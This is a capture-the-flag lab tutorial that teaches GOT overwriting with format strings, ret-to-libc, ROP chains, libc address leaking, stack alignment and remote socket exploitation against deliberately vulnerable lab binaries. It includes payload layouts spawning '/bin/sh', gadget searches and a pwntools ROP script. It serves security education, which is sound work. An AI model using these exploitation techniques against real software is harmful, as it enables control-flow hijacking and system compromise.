> pdisas 0x8048590-0x20 > 0x8048570 <err@plt> jmp dword ptr [err@got.plt] <0x804a024> 0x8048576 <err@plt+6> push 0x30 0x804857b <err@plt+11> jmp 0x8048500 <0x8048500> 0x8048580 <fread@plt> jmp dword ptr [fread@got.plt] <0x804a028> 0x8048586 <fread@plt+6> push 0x38 0x804858b <fread@plt+11> jmp 0x8048500 <0x8048500> 0x8048590 <puts@plt> jmp dword ptr [puts@got.plt] <0x804a02c> 0x8048596 <puts@plt+6> push 0x40 0x804859b <puts@plt+11> jmp 0x8048500 <0x8048500> ...
As you can see, the PLT is a table containing (among other things) stub functions that each just jump to an address read from the GOT. puts@got.plt (0x804a02c) is the actual GOT entry for puts(), where the address is stored.
puts@got.plt
0x804a02c
Let's follow this call (i.e., single-stepping into the call with stepi):
stepi
> 0x8048590 <puts@plt> jmp dword ptr [puts@got.plt] <0x804a02c> 0x8048596 <puts@plt+6> push 0x40 0x804859b <puts@plt+11> jmp 0x8048500 <0x8048500> v 0x8048500 push dword ptr [_GLOBAL_OFFSET_TABLE_+4] <0x804a004> 0x8048506 jmp dword ptr [0x804a008] <_dl_runtime_resolve> v 0xf7fb8dd0 <_dl_runtime_resolve> push eax 0xf7fafe11 <_dl_runtime_resolve+1> push ecx 0xf7fafe12 <_dl_runtime_resolve+2> push edx
The GOT entry for puts() (puts@got.plt) initially points to puts@plt+6, which is the next instruction after puts@plt. This ends up invoking _dl_runtime_resolve() with two parameters: a pointer to the start of the GOT itself (_GLOBAL_OFFSET_TABLE_+4), and a value indicating which function should be resolved (0x40, meaning puts()). Once _dl_runtime_resolve() is done, puts@got.plt will point to the real puts() in libc (0xf7e11b40 in this case).
puts@plt+6
_GLOBAL_OFFSET_TABLE_+4
0xf7e11b40
Your goal is to use a format string to overwrite the GOT entry of puts() with another function's address, so that execution will be hijacked when puts() is called.
There are two challenges you'll encounter when doing this:
In order to reach the only call to puts() that occurs after your format string is parsed, you must also overwrite the secret value:
if (tmp != secret) { puts("The secret is modified!\n"); }
[Task] What should the "writes" param for fmtstr_payload() be?
fmtstr_payload()
Unfortunately, the size of the buffer is very limited, meaning it might not be able to fit the format strings for both write targets.
void handle_failure(char *buf) { char msg[100]; ... }
Do you remember the %hn/%hhn trick that lets you overwrite fewer bytes at a time, like one or two? That's where write_size comes into play:
write_size
fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') write_size (str): must be byte, short or int. Tells if you want to write byte by byte, short by short or int by int (hhn, hn or n)
str
byte
short
Finally! Can you hijack the puts() invocation to redirect it to print_key() to get your flag for this tutorial?
[Task] In the given template.py, modify the payload to redirect the puts() invocation to print_key(), and get your flag!
template.py
In Lab 5, we learned that even when data execution prevention (DEP) and address-space layout randomization (ASLR) are applied, there can still be application-specific exploits that lead to full control-flow hijacking. In this tutorial, we'll learn a more generic technique called "return-oriented programming" (ROP), which can perform reasonably arbitrary computation without injecting any shellcode.
To make our tutorial easier, we'll assume code pointers are already leaked (e.g., system() and printf() in the libc library).
system()
void start() { printf("IOLI Crackme Level 0x00\n"); printf("Password:"); char buf[32]; memset(buf, 0, sizeof(buf)); read(0, buf, 256); if (!strcmp(buf, "250382")) printf("Password OK :)\n"); else printf("Invalid Password!\n"); } int main(int argc, char *argv[]) { void *self = dlopen(NULL, RTLD_NOW); printf("stack : %p\n", &argc); printf("system(): %p\n", dlsym(self, "system")); printf("printf(): %p\n", dlsym(self, "printf")); start(); return 0; }
$ checksec ./target [*] '/home/lab06/tut06-rop/target' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)
Notice that NX is enabled, meaning you cannot place any shellcode in the stack or heap. However, the stack protector is disabled, which allows us to initiate a control-flow hijacking attack.
Previously, we could compute anything we wanted (such as launching an interactive shell) by jumping into our injected shellcode, but with DEP enabled, we can no longer achieve that. However, it turns out that DEP alone is still not powerful enough to completely prevent this problem.
Let's take the first step by learning a technique often called "ret-to-libc."
$ ./target stack : 0xffdcba40 system(): 0xf7d3e200 printf(): 0xf7d522d0 IOLI Crackme Level 0x00 Password:
[Task] Your first task is to trigger a buffer overflow and print out "Password OK :)"!
Your payload should look like this:
[ buf ] [ ... ] [ ra ] -> printf() [dummy] [arg 1] -> "Password OK :)"
When start() returns, it will jump to our chosen return address as before, but this time we've selected the address of printf() as the target -- that is, we're setting up a call to printf(). To do that properly, we need a dummy stack value as a placeholder for the return address that would normally be put there when a function is called with the call instruction, followed by the function's actual argument(s).
start()
Thus, when printf() is invoked with the payload outlined above, "Password OK :)" will be read as its first argument. As this exploit "returns" to a libc function, this technique is often called "ret-to-libc".
Let's get a shell out of this vulnerability. To do this, we're simply going to invoke the system() function instead of printf(). (Check "man system" if you're not familiar with it.)
man system
You can easily adapt the previous payload by replacing printf()'s address with that of system(), and changing the string argument:
[ buf ] [ ... ] [ ra ] -> system() [dummy] [arg 1] -> "/bin/sh"
But how do we get a pointer to "/bin/sh"? In fact, a typical process (and libc) actually contains lots of strings like that. After all, this is how system() itself is implemented -- it essentially invokes system calls like fork() and execve() on "/bin/sh" with provided arguments (you can look at its actual implementation in glibc or musl if you're interested).
"/bin/sh"
fork()
pwndbg provides a convenient interface to search for a string in memory:
$ gdb-pwndbg ./target ... pwndbg> r Starting program: /home/lab06/tut06-rop/target stack : 0xffffd540 system(): 0xf7e1a250 printf(): 0xf7e2e3a0 IOLI Crackme Level 0x00 Password:^C ... pwndbg> search "/bin" libc-2.27.so 0xf7f5b3cf das /* '/bin/sh' */ libc-2.27.so 0xf7f5c8b9 das /* '/bin:/usr/bin' */ libc-2.27.so 0xf7f5c8c2 das /* '/bin' */ libc-2.27.so 0xf7f5cdc7 das /* '/bin/csh' */ ...
There are many strings here you can use as an argument to system(). Note that all of these pointers will be different on each execution, thanks to libc's ASLR.
Our goal is to invoke system("/bin/sh") like this:
system("/bin/sh")
[ buf ] [ ... ] [ ra ] -> system() (address provided by binary: 0xf7e1a250) [dummy] [arg 1] -> "/bin/sh" (found address by searching: 0xf7f5b3cf)
Unfortunately though, as mentioned, the addresses keep changing. So how can we figure out the correct address of the "/bin/sh" string for a particular invocation of target?
As you learned from the "libbase" challenge in Lab 5, ASLR doesn't randomize offsets within a module, it just randomizes the base address of the entire module. (Do you know why?) So while libc as a whole has an unpredictable address, the difference between any two libc addresses will always be the same. Therefore, if you can learn the address of anything in libc, you can calculate the address of anything else in it:
0xf7f5b3cf ("/bin/sh") - 0xf7e1a250 (system()) = 0x14117f
So in your exploit, you can use system()'s address to calculate that of "/bin/sh" (e.g., (system()) + 0x14117f = ("/bin/sh")).
(system()) + 0x14117f = ("/bin/sh")
By the way, you can also calculate system()'s address (0xf7e1a250) "by hand", by finding libc's base address and system()'s offset in the library. Try vmmap in pwndbg:
0xf7e1a250
pwndbg> vmmap LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 0x8048000 0x8049000 r-xp 1000 0 /home/lab06/tut06-rop/target 0x8049000 0x804a000 r--p 1000 0 /home/lab06/tut06-rop/target 0x804a000 0x804b000 rw-p 1000 1000 /home/lab06/tut06-rop/target 0xf7ddd000 0xf7fb2000 r-xp 1d5000 0 /usr/local/lib/i386-linux-gnu/libc-2.27.so 0xf7fb2000 0xf7fb3000 ---p 1000 1d5000 /usr/local/lib/i386-linux-gnu/libc-2.27.so 0xf7fb3000 0xf7fb5000 r--p 2000 1d5000 /usr/local/lib/i386-linux-gnu/libc-2.27.so 0xf7fb5000 0xf7fb6000 rw-p 1000 1d7000 /usr/local/lib/i386-linux-gnu/libc-2.27.so ...
The base address (a mapped region) of libc is 0xf7ddd000. The "x" in the "r-xp" permission bits for that region tells you that it's eXecutable (i.e., code).
0xf7ddd000
Now we know libc's base address, but where is system() located within it? You can find that with readelf like so:
readelf
$ readelf -s /usr/local/lib/i386-linux-gnu/libc-2.27.so | grep system 254: 00129870 102 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0 652: 0003d250 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE 1510: 0003d250 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
0x0003d250 is the beginning of the system() function inside libc, so libc's base address plus 0x0003d250 should be the address we observed previously.
0x0003d250
0xf7ddd000 (base) + 0x0003d250 (offset) = 0xf7e1a250 (system())
[Task] Can you calculate libc's base address from a leaked system() address from target? And what's the offset of "/bin/sh" in libc? Can you successfully invoke the shell?
Generating a segfault after exploitation is a bit unfortunate, so let's make the hijacked binary terminate gracefully. Our plan is to chain two library calls. This is the next step toward generic computation.
Let's chain exit() after system(), like so:
exit()
system("/bin/sh"); exit(0);
Let's think about what happens when system("/bin/sh") returns -- that is, when you exit the shell (by typing "exit" or Ctrl+C).
Have you noticed that the IP gets set to the "dummy" value when the program crashes? In other words, you can control the next return address and use this to chain an additional function call. What if we set "dummy" to the address of exit()?
[ buf ] [ ... ] [ra 1 ] -> (1) system() [ra 2 ] ---------------------> (2) exit() [arg 1] -> (1) "/bin/sh" [arg 2] ---------------------> (2) 0
When system() returns, exit() will be invoked next. You can even control its argument, as shown above (arg 2 (i.e., the argument for the second call) = 0).
[Task] Try it! You should be able to calculate the address of exit() using the techniques discussed earlier.
Unfortunately, this chaining scheme will stop working after the second call.
This week, you'll learn more generic and powerful techniques that let your payloads keep going even further. Since you're using return addresses to create a sequence of function calls, this is known as return-oriented programming (ROP).
Consider what would happen if the second function was something other than exit(), and execution continued:
[ buf ] [ ... ] [ra 1 ] -> (1) func1() [ra 2 ] ---------------------> (2) func2() [arg 1] -> (1) arg1 [arg 2] ---------------------> (2) arg2
The sequence of events is this:
func1(arg1)
func2(arg2)
After func2(arg2), "arg1" will be the next return address in this payload.
Time to learn a neat trick, a "pop/ret gadget":
[ buf ] [ ... ] [ra 1 ] -> (1) func1() [ra 2 ] ---------------------> (2) pop/ret gadget [arg 1] -> (1) arg1 [dummy]
This results in a crash at dummy!
dummy
A "pop/ret gadget" is just a pop instruction (e.g., pop eax) followed by a ret instruction. By pointing the second return address to that, the binary will (1) call func1(arg1), (2) pop "arg1" (so now the stack pointer points to "dummy"), and (3) return again (i.e., crash at "dummy").
pop
pop eax
ret
Then we can put the actual second function address there:
[ buf ] [ ... ] [ra 1 ] -> (1) func1() [ra 2 ] -----------------> (2) pop/ret gadget [arg 1] -> (1) arg1 [ra 3 ] ---------------------------------------> (3) func2() [dummy] [arg 2] ---------------------------------------> (3) arg2
When we reach "ra 3", we've essentially gone back to the very first state in which we hijacked the control flow by smashing the stack. So in order to chain func2(), we can hijack the control-flow again in the same way. (And then we could follow that with another pop/ret gadget if we wanted to call a third function, and so on!)
func2()
Although pop/ret gadgets are everywhere (check pretty much any function!), pwntools provides a useful tool to search for all interesting gadgets for you.
$ ropper -f ./target ... 0x08048479: pop ebx; ret; ...
[Task] Can you chain system("/bin/sh") and exit(0) using the pop/ret gadget, like below? [ buf ] [ ... ] [ra 1 ] -> (1) system() [ra 2 ] -----------------> (2) pop/ret gadget [arg 1] -> (1) "/bin/sh" [ra 3 ] ---------------------------------------> (3) exit() [dummy] [arg 2] ---------------------------------------> (3) 0
[Task] Can you chain system("/bin/sh") and exit(0) using the pop/ret gadget, like below?
exit(0)
[ buf ] [ ... ] [ra 1 ] -> (1) system() [ra 2 ] -----------------> (2) pop/ret gadget [arg 1] -> (1) "/bin/sh" [ra 3 ] ---------------------------------------> (3) exit() [dummy] [arg 2] ---------------------------------------> (3) 0
By the way, ropper also provides a more convenient way to search for string addresses in an ELF:
ropper
$ ropper -f /usr/local/lib/i386-linux-gnu/libc-2.27.so --string "/bin/sh" Strings ======= Address Value ------- ----- 0x0017e3cf /bin/sh
Using this "gadget", we can keep chaining multiple functions together. We can also handle functions with more than one argument, like this:
[ buf ] [ ... ] [ra 1 ] -> (1) func1() [ra 2 ] -----------------> (2) pop/ret gadget [arg 1] -> (1) arg1 [ra 3 ] -> (3) func2() [ra 4 ] -----------------> (4) pop/pop/ret gadget [arg 2] -> (3) arg2 [arg 3] -> (3) arg3 [ra 5 ] ...
func2(arg2, arg3)
Every gadget (whether it's a whole function or just part of one) ends with a ret instruction, which is what gives return-oriented-programming its name.
[Task] It's time to chain three functions! Can you invoke the three functions below in sequence?
printf("Password OK :)"); system("/bin/sh"); exit(0);
Your final job for today is to chain the following ROP payload:
open("/proc/flag", O_RDONLY); read(3, tmp_buf, 1040); write(1, tmp_buf, 1040);
More specifically, prepare the payload like this:
[ buf ] [ ... ] [ra 1 ] -> (1) open() [ra 2 ] -----------------> (2) pop/pop/ret [arg 1] -> (1) "/proc/flag" [arg 2] -> (1) 0 (O_RDONLY) [ra 3 ] -> (3) read() [ra 4 ] -----------------> (4) pop/pop/pop/ret [arg 3] -> (3) 3 (the new fd) [arg 4] -> (3) tmp_buf [arg 5] -> (3) 1040 [ra 5 ] -> (5) write() [dummy] [arg 6] -> (5) 1 (stdout) [arg 7] -> (5) tmp_buf [arg 8] -> (5) 1040
tmp_buf
"/proc/flag"
[Task] Exploit target-seccomp with your payload and submit the flag!
target-seccomp
pwntools includes a very advanced ROP library for constructing ROP payloads. Take a look at the documentation for more details, but here's a quick tour:
#!/usr/bin/env python3 from pwn import * # Override pwntools's default cache directory to your secret tmp directory # (workaround for <https://github.com/Gallopsled/pwntools/issues/2072>) os.environ['XDG_CACHE_HOME'] = './' # Our ROP chain will use gadgets from the following ELFs rop = ROP([ELF('/home/lab06/tut06-rop/target'), ELF('/usr/local/lib/i386-linux-gnu/libc-2.27.so')]) # Write a ROP chain that calls some libc functions! rop.call('system', ['/bin/sh']) rop.call('exit', [0]) # Pretty-print the finished payload print(rop.dump()) # Convert it to bytes payload = rop.chain() print(payload)
Example output:
0x0000: 0x3d250 system(['/bin/sh']) 0x0004: 0x2c58a <adjust @0xc> add esp, 4; ret 0x0008: 0x18 arg0 0x000c: 0x30420 exit(0) 0x0010: b'eaaa' <return address> 0x0014: 0x0 arg0 0x0018: b'/bin/sh\x00' b'P\xd2\x03\x00\x8a\xc5\x02\x00\x18\x00\x00\x00 \x04\x03\x00eaaa\x00\x00\x00\x00/bin/sh\x00'
This is a very convenient tool, as it can
But just like with pwntools's format-string exploit generator, you have to know how to use it properly, how to debug when things go wrong, and how to write ROP chains manually if you encounter a situation the library can't handle. In fact, the payload produced by the code above will not work as-is -- can you figure out why? (Hint: search the documentation for "base".)
base
There exists a tool called OneGadget, which searches the glibc ELF for individual gadgets that can launch a shell. We strongly recommend against using it, as it can make several of the challenges too easy. We want you to learn how to write ROP chains instead of just using an automatic tool that can do it for you. But keep it in mind if you ever play similar CTF challenges outside of our class in the future!
In the last tutorial, we used code and stack pointers freely leaked by the binary in our control-hijacking attacks. In this tutorial, we'll exploit the same program again, but this time without any a-priori information leaks, and also in x86_64 (64-bit).
$ checksec ./target [*] '/home/lab06/tut06-advrop/target' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
As before, DEP (NX) is enabled, so pages not explicitly marked as executable will not be executable. PIE is also not enabled, which means that the target executable's base address will not be randomized by ASLR (but note that libraries, the heap, and stack addresses will still be randomized). There's also no canary, meaning we can smash the stack and immediately start hijacking control flow.
[Task] Your first task is to trigger a buffer overflow and control rip.
rip
You can control rip with the following payload:
[ buf ] [ ... ] [ ra ] -> func [dummy] [ ... ] -> arg?
In 32-bit x86, we could control the invoked function's arguments by writing them to the stack. This no longer works in x86_64, as parameters are now conventionally passed using registers. For example, the first argument to a function will be read from rdi, instead of from somewhere on the stack.
rdi
In the last tutorial, we only used the pop; ret gadget to clean up the stack, but it can also be used to control registers. For example, by executing pop rdi; ret, you can set the rdi register to a controlled value from the stack.
pop; ret
pop rdi; ret
Let's control the argument to puts() with the following payload:
[ buf ] [ ... ] [ ra ] -> pop rdi; ret [arg1 ] [ ra ] -> puts() [ ra ]
Since our binary is not PIE-enabled, we can search for gadgets in its code.
First, let's look for the pop gadget:
$ ropper --file ./target --search "pop rdi; ret" ... [INFO] File: ./target 0x00000000004008d3: pop rdi; ret;
Next we need the address of puts(). puts() lives in libc, and since libc has a randomized base address due to ASLR, we can't predict its address. How can we solve this?
While it's true that we can't call the actual implementation of puts() in libc directly, we can invoke it indirectly, through the resolved address stored in the program's GOT.
Do you remember how the program invoked external functions through the PLT/GOT, like this?
0x0000000000400600 <puts@plt>: +--0x400600: jmp QWORD PTR [rip+0x200a12] # GOT of puts() | | (first time) +->0x400646: push 0x0 # index of puts() | 0x40064b: jmp 0x4005f0 <.plt> # resolve libc's puts() | | (once resolved) +--> puts() @libc 0x0000000000400767 <start>: ... 400776: call 0x4006a0 <puts@plt>
The PLT and GOT are part of the target binary, so their addresses are constant. We can therefore invoke puts() by jumping into the PLT code corresponding to it.
pwndbg also provides an easy way to look up PLT routines in the binary:
pwndbg> plt 0x400600: puts@plt 0x400610: printf@plt 0x400620: memset@plt 0x400630: geteuid@plt 0x400640: read@plt 0x400650: strcmp@plt 0x400660: setreuid@plt 0x400670: setvbuf@plt
[Task] Your first task is to trigger a buffer overflow and print out "Password OK :)"! This is our arbitrary-read primitive.
[ buf ] [ ... ] [ ra ] -> pop rdi; ret [arg1 ] -> "Password OK :)" [ ra ] -> puts@plt [ ra ] (crashing)
Although the process image has lots of interesting functions in its PLT/GOT that we can abuse, it's missing the truly powerful functions like system() that allow for arbitrary code execution. To invoke arbitrary libc functions, we'll first need to leak code pointers pointing to libc.
Which part of the process image contains libc pointers? The GOT! After all, the goal of puts@plt (below) is to act as a bridge between the binary and puts@libc, by reading the latter's real address from the GOT and jumping to it:
puts@libc
0x0000000000400600 <puts@plt>: 0x400600: jmp QWORD PTR [rip+0x200a12] # GOT of puts()
What's the address of puts@GOT? It's rip + 0x200a12, so... 0x400606 + 0x200a12 = 0x601018. (We use 0x400606 because rip always points to the next instruction, and that jmp instruction is six bytes long.)
puts@GOT
rip + 0x200a12
0x400606 + 0x200a12 = 0x601018
0x400606
jmp
pwndbg provides a convenient way to look up entries in the binary's GOT, as well:
pwndbg> got GOT protection: Partial RELRO | GOT functions: 10 [0x601018] puts@GLIBC_2.2.5 -> 0x7ffff7a64a30 (puts) ◂— push r13 [0x601020] printf@GLIBC_2.2.5 -> 0x7ffff7a48f00 (printf) ◂— sub rsp, 0xd8 ...
So the address of libc's puts() can be found in the target's GOT, specifically at 0x601018. Separately, as we found earlier, we also have the ability to call puts() through its PLT entry. Since puts() can be thought of as printing memory from whatever pointer you provide to it, we can use it to read and print puts()'s address value from the GOT -- even though that's not actually a string.
0x601018
To do that, your payload should look like this:
[ buf ] [ ... ] [ ra ] -> pop rdi; ret [arg1 ] -> puts@got [ ra ] -> puts@plt [ ra ] (crashing)
Note that puts() might not output all 8 bytes of the address (64-bit pointer), since the address contains multiple zeros (remember, puts() stops when it reaches a null byte).
[Task] Leak the address of libc's puts()!
So now what? We can calculate libc's base address from the leaked pointer to puts(), so can we now invoke any function in libc? Perhaps like this:
[ buf ] [ ... ] [ ra ] -> pop rdi; ret [arg1 ] -> puts@got [ ra ] -> puts@plt [ ra ] -> pop rdi; ret [arg1 ] -> "/bin/sh"@libc [ ra ] -> system()@libc [ ra ] (crashing)
Unfortunately, it's not quite that easy. When you're preparing the payload, you don't yet know the address of libc, since the code that will eventually leak puts@got has not yet been executed.
puts@got
Of all the places we know, is there anywhere we can jump to to continue to interact with the process, so we can send additional ROP input? Yes, the start() function! Let's execute start() a second time and smash the stack once more, this time armed with knowledge of libc's base address.
[Task] Jump to start(), which has the stack overflow, a second time. Make sure that you see the program banner twice!
payload1: [ buf ] [ ... ] [ ra ] -> pop rdi; ret [arg1 ] -> puts@got [ ra ] -> puts@plt [ ra ] -> start
The program is now executing the vulnerable start() once more, and waiting for your input. It's time to ROP again, to invoke system() with the resolved addresses.
[Task] Invoke system("/bin/sh")!
payload2: [ buf ] [.....] [ ra ] -> pop rdi; ret [arg1 ] -> "/bin/sh" [ ra ] -> system@libc
Similar to the last tutorial, we'll invoke a sequence of calls in order to read the flag from target-seccomp.
open("anystring", 0);
read(3, tmp, 1040);
write(1, tmp, 1040);
open()
As we discussed earlier, we can control the first argument of a function call in x86_64 by popping a value into rdi. To control the second argument, we need an equivalent gadget for rsi.
rsi
$ ropper --file ./target --search 'pop rsi; ret' <... nope ...>
Unfortunately, the target binary doesn't have pop rsi; ret. But there is another gadget that's effectively identical:
pop rsi; ret
$ ropper --file ./target --search 'pop rsi; pop %; ret' ... 0x00000000004008d1: pop rsi; pop r15; ret;
With that, invoking open() is pretty doable:
payload2: [ buf ] [ ... ] [ ra ] -> pop rdi; ret [arg1 ] -> "anystring` [ ra ] -> pop rsi; pop r15; ret [arg2 ] -> 0 [dummy] (r15) [ ra ] -> open()
read()
To invoke read(), we'll need one more gadget to control its third argument: pop rdx; ret. Unfortunately, the target binary doesn't have any suitable gadgets for that.
pop rdx; ret
What should we do? Actually, at this point, since we know the address of libc, we can use additional ROP gadgets from there, too!
$ ldd target-seccomp linux-vdso.so.1 (0x00007ffe65f89000) libseccomp.so.2 => /lib/x86_64-linux-gnu/libseccomp.so.2 (0x00007fd118f39000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd118b48000) /lib64/ld-linux-x86-64.so.2 (0x00007fd119159000) $ ropper --file /lib/x86_64-linux-gnu/libc.so.6 --search 'pop rdx; ret' 0x0000000000001b96: pop rdx; ret; ...
Your secondary payload should now look like this:
payload2: [ buf ] [ ... ] [ ra ] -> pop rdi; ret [arg1 ] -> 3 [ ra ] -> pop rsi; pop r15; ret [arg2 ] -> tmp [dummy] (r15) [ ra ] -> pop rdx; ret [arg3 ] -> 1040 [ ra ] -> read()
[Task] Your final task is to chain open()/read()/write() and get the real flag from target-seccomp!
write()
What if either PIE or SSP (stack canary) was enabled? Do you think we could still exploit this vulnerability?
When returning to libc functions in a 64-bit binary through a ROP chain, you can encounter a situation where the program segfaults on a "movaps" or "stosq" instructions in functions like buffered_vfprintf() or do_system(), as shown in the core dump below:
movaps
stosq
buffered_vfprintf()
do_system()
$ gdb-pwndbg ./target-seccomp core Reading symbols from ./target-seccomp... Program terminated with signal SIGSEGV, Segmentation fault. ... RBP 0x7ffe05c19d58 -> 0x7ffe05c19e68 <- 'BBBBBBBB\n' RSP 0x7ffe05c17678 -> 0x7ffe05c17759 <- 0x0 RIP 0x7f5a4e17c75e <- 0x848948502444290f ----------------------------------------[ DISASM ]----------------------------------------- > 0x7f5a4e17c75e movaps xmmword ptr [rsp + 0x50], xmm0 0x7f5a4e17c763 mov qword ptr [rsp + 0x108], rax 0x7f5a4e17c76b call 0x7f5a4e179490 <0x7f5a4e179490>
This is because some of the 64-bit libc functions require your stack to be 16-byte aligned -- that is, the address in rsp must end with a "0" when they are called. Below, you can see that this constraint has been violated, as the address in rsp ends with an "8":
rsp
*RSP 0x7fffc4cb3bb8 -> 0x400767 (start) <- push rbp *RIP 0x7f6636241140 (read) <- lea rax, [rip + 0x2e0891] ----------------------------------------[ DISASM ]----------------------------------------- 0x4008d4 <__libc_csu_init+100> ret V 0x7f6636234d69 <_getopt_internal+89> pop rdx 0x7f6636234d6a <_getopt_internal+90> pop rcx 0x7f6636234d6b <_getopt_internal+91> pop rbx 0x7f6636234d6c <_getopt_internal+92> ret V > 0x7f6636241140 <read> lea rax, [rip + 0x2e0891] <0x7f66365219d8> 0x7f6636241147 <read+7> mov eax, dword ptr [rax] 0x7f6636241149 <read+9> test eax, eax 0x7f663624114b <read+11> jne read+32 <read+32>
Since rsp is not 16-byte aligned, when we continue, the program ends up segfaulting on the aforementioned movaps instruction.
How can we deal with this situation? That is, how can we adjust our data on the stack to be properly aligned?
The simple solution is to add an extra ret to the beginning of your ROP chain. When ret is invoked, it increments rsp by 8 (you already know why!). Thus, you can simply add a dummy ret to make rsp 16-byte aligned.
There are many ret instructions in the binary. You can pick any of them and add it to your ROP chain. If you already have the address of a pop rdi; ret gadget, you can just add 1 to get the address of ret, since pop rdi is a one-byte instruction.
pop rdi
For example, the payload shown in Step 4 can be revised to:
payload2: [ buf ] [ ... ] [ ra ] -> ret // dummy return is added to align the stack! [ ra ] -> pop rdi; ret // followed by your original rop chain [arg1 ] -> 3 [ ra ] -> pop rsi; pop r15; ret [arg2 ] -> tmp [dummy] (r15) [ ra ] -> pop rdx; ret [arg3 ] -> 1040 [ ra ] -> read()
Verifying in GDB that the dummy ret is added to the ROP chain (right after the end of start()):
> 0x4007eb <start+132> ret <0x4008d4; __libc_csu_init+100> V 0x4008d4 <__libc_csu_init+100> ret // THIS IS THE ADDED RET V 0x4008d3 <__libc_csu_init+99> pop rdi 0x4008d4 <__libc_csu_init+100> ret
As a result, when returning into read(), rsp now ends with a "0" (16-byte aligned):
*RSP 0x7ffe49f96c60 -> 0x400767 (start) <- push rbp *RIP 0x7f4bc3bc5140 (read) <- lea rax, [rip + 0x2e0891] ----------------------------------------[ DISASM ]----------------------------------------- 0x4008d4 <__libc_csu_init+100> ret V 0x7f4bc3bb8d69 <_getopt_internal+89> pop rdx 0x7f4bc3bb8d6a <_getopt_internal+90> pop rcx 0x7f4bc3bb8d6b <_getopt_internal+91> pop rbx 0x7f4bc3bb8d6c <_getopt_internal+92> ret V > 0x7f4bc3bc5140 <read> lea rax, [rip + 0x2e0891] <0x7f4bc3ea59d8> 0x7f4bc3bc5147 <read+7> mov eax, dword ptr [rax] 0x7f4bc3bc5149 <read+9> test eax, eax 0x7f4bc3bc514b <read+11> jne read+32 <read+32>
When finding the offset of a function like memcpy() in your libc library (not needed for this tutorial, but other challenges in this lab may have you use other functions like that), you might notice that there are multiple memcpy()-like functions there. This is called an "indirect function", or "ifunc" (glibc code, gcc documentation), and it allows glibc to select the best-optimized version of the function for the hardware's capabilities detected at runtime.
memcpy()
$ # note: `readelf` doesn't work here because most of the ifunc symbol $ # names aren't exported -- but we can still see them with `strings`: $ strings /lib/x86_64-linux-gnu/libc.so.6 | grep memcpy | grep -v wmem __memcpy_chk __memcpy_chk __memcpy_chk_avx512_unaligned __memcpy_chk_avx_unaligned __memcpy_chk_ssse3_back __memcpy_chk_ssse3 __memcpy_chk_sse2_unaligned __memcpy_chk_erms memcpy __memcpy_avx_unaligned __memcpy_avx_unaligned_erms __memcpy_ssse3_back __memcpy_ssse3 __memcpy_avx512_no_vzeroupper __memcpy_avx512_unaligned __memcpy_sse2_unaligned __memcpy_sse2_unaligned_erms __memcpy_erms __memcpy_chk_avx512_no_vzeroupper __memcpy_chk_avx512_unaligned_erms __memcpy_chk_avx_unaligned_erms __memcpy_chk_sse2_unaligned_erms __memcpy_avx512_unaligned_erms
Unfortunately, this tends to confuse GDB and pwntools, and they can report incorrect addresses for such functions. A reliable way to determine the right address is with a simple C program like this (compile with -m32 for 32-bit or -m64 for 64-bit):
-m32
-m64
#include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> typedef long long unsigned int llui_t; // Before compiling, find `printf()`'s libc offset through some other // means (readelf, gdb, pwntools, etc), and put it below: #define PRINTF_OFFSET 0x000513a0 int main() { uintptr_t libc = (uintptr_t)printf - PRINTF_OFFSET; printf("libc: %#llx\n", (llui_t)libc); if (libc & 0xfff) { printf("libc address looks wrong! Please double-check `PRINTF_OFFSET`.\n"); return 1; } printf("memcpy: %#llx\n", (llui_t)((uintptr_t)memcpy - libc)); printf("memset: %#llx\n", (llui_t)((uintptr_t)memset - libc)); printf("strcmp: %#llx\n", (llui_t)((uintptr_t)strcmp - libc)); return 0; }
For a longer list of ifuncs in libc, try readelf -a [/.../libc.so.6] | grep IFUNC. Roughly speaking, most of them are "mem" and "str" functions.
readelf -a [/.../libc.so.6] | grep IFUNC
In this tutorial, we'll learn about basic socket programming in Python, and techniques for remote exploitation.
nc
The netcat command -- or nc for short -- is similar to the cat command, but for networking.
netcat
cat
Here's a simple demo. Open two console windows side-by-side, and run a command in each, as shown below:
$ nc -l 1234
$ nc localhost 1234
The nc [address] [port] command connects to a server which is running at the given address and port. ("localhost" is an alias of 127.0.0.1, which is a reserved IP address that refers to your own computer.) nc -l [port] listens for connections to the given port, thus creating a very simple server.
nc [address] [port]
address
port
127.0.0.1
nc -l [port]
Now type "hello" in console window 2 and hit <enter>:
<enter>
Did you get the "hello" message in console 1? What if you type "world" as a reply in console 1?
You've just created a nice chat program! You can talk to your fellow students on our server this way :)
If it doesn't work, someone else may already be using port 1234 on the lab server. You can try a different port number, or try it on your local machine instead. This advice applies to the rest of the tutorial, too -- it's a good idea to change port numbers from the defaults when trying things on the lab server.
If it doesn't work, someone else may already be using port 1234 on the lab server. You can try a different port number, or try it on your local machine instead.
This advice applies to the rest of the tutorial, too -- it's a good idea to change port numbers from the defaults when trying things on the lab server.
Today's goal is to beat the computer in a game of rock-paper-scissors!
First, execute target and let it listen to some arbitrary port (e.g., 1234).
$ ssh lab07@<ctf-server-address> $ mkdir /tmp/<your-secret-dir> $ cd /tmp/<your-secret-dir> $ cp -rf ~/tut07-socket ./ $ ./target 1234
In another console, use nc to connect to the target server that you just started:
$ ssh lab07@<ctf-server-address> $ nc localhost 1234 Let's play rock, paper, scissors! Your name>
FYI, on the server, the target service is already running on port 10700, and that's the one you'll need to beat to get the flag. You can also remotely connect to the service from outside the server:
$ nc <ctf-server-address> 10700
Do you want to explore the program a bit?
$ nc localhost 1234 Let's play rock, paper, scissors! Your name> cs6265 Your turn> rock You lose! Game over
You have to win 5 times in a row to win the whole game... so the odds aren't TOO bad for brute-forcing.
Let's use pwntools for socket operations. The following code snippet opens a socket on port 1234, reads 10 bytes from it, and writes them back to it:
from pwn import * s = remote("localhost", 1234) s.send(s.recv(10)) s.close()
We've provided some template code (template.py) to help you write a socket client program in Python.
$ ./target 9736
$ ./template.py
